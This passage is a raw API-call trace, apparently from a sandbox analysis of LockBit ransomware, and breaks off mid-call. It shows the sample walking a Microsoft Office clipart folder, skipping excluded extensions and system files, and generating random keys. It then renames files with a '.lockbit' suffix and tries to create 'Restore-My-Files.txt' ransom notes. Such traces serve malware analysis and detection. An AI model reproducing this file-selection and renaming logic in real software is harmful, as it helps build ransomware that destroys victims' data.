param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.508] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x15fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02106_.GIF", cAlternateFileName="")) returned 1 [0185.508] lstrcmpiW (lpString1=".", lpString2="WB02106_.GIF") returned -1 [0185.508] lstrcmpiW (lpString1="..", lpString2="WB02106_.GIF") returned -1 [0185.508] PathFindExtensionW (pszPath="WB02106_.GIF") returned=".GIF" [0185.508] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.508] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.508] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.508] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.508] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.508] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.509] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.509] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.510] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.510] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="ntldr", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02106_.GIF") returned -1 [0185.510] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02106_.GIF") returned -1 [0185.510] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.511] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF") returned=".GIF" [0185.511] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.511] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.511] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.512] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.512] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.512] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.512] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.512] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.lockbit") returned 85 [0185.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02106_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0185.513] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.513] malloc (_Size=0x40068) returned 0x3d70450 [0185.513] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5626) returned 1 [0185.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0185.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0185.515] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.519] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.519] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.520] free (_Block=0x1fa2ed8) [0185.520] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.520] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.521] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.521] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02116_.GIF", cAlternateFileName="")) returned 1 [0185.521] lstrcmpiW (lpString1=".", lpString2="WB02116_.GIF") returned -1 [0185.521] lstrcmpiW (lpString1="..", lpString2="WB02116_.GIF") returned -1 [0185.521] PathFindExtensionW (pszPath="WB02116_.GIF") returned=".GIF" [0185.521] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.521] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.521] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.521] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.521] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.521] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.521] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.522] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.522] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.522] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.522] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.522] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.522] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.523] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="ntldr", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02116_.GIF") returned -1 [0185.523] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02116_.GIF") returned -1 [0185.523] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.523] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF") returned=".GIF" [0185.523] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.523] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.523] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.524] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.524] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.525] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.525] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.lockbit") returned 85 [0185.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02116_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0185.530] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.530] malloc (_Size=0x40068) returned 0x3f70048 [0185.530] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1007) returned 1 [0185.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0185.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0185.531] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.534] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.534] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.535] free (_Block=0x1fa2ed8) [0185.535] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.535] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.535] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.536] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x97f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02134_.GIF", cAlternateFileName="")) returned 1 [0185.536] lstrcmpiW (lpString1=".", lpString2="WB02134_.GIF") returned -1 [0185.536] lstrcmpiW (lpString1="..", lpString2="WB02134_.GIF") returned -1 [0185.536] PathFindExtensionW (pszPath="WB02134_.GIF") returned=".GIF" [0185.536] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.536] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.536] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.537] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.537] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.537] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.537] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.537] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.537] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="ntldr", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02134_.GIF") returned -1 [0185.538] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02134_.GIF") returned -1 [0185.538] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.538] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF") returned=".GIF" [0185.538] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.538] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.538] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.538] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.538] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW 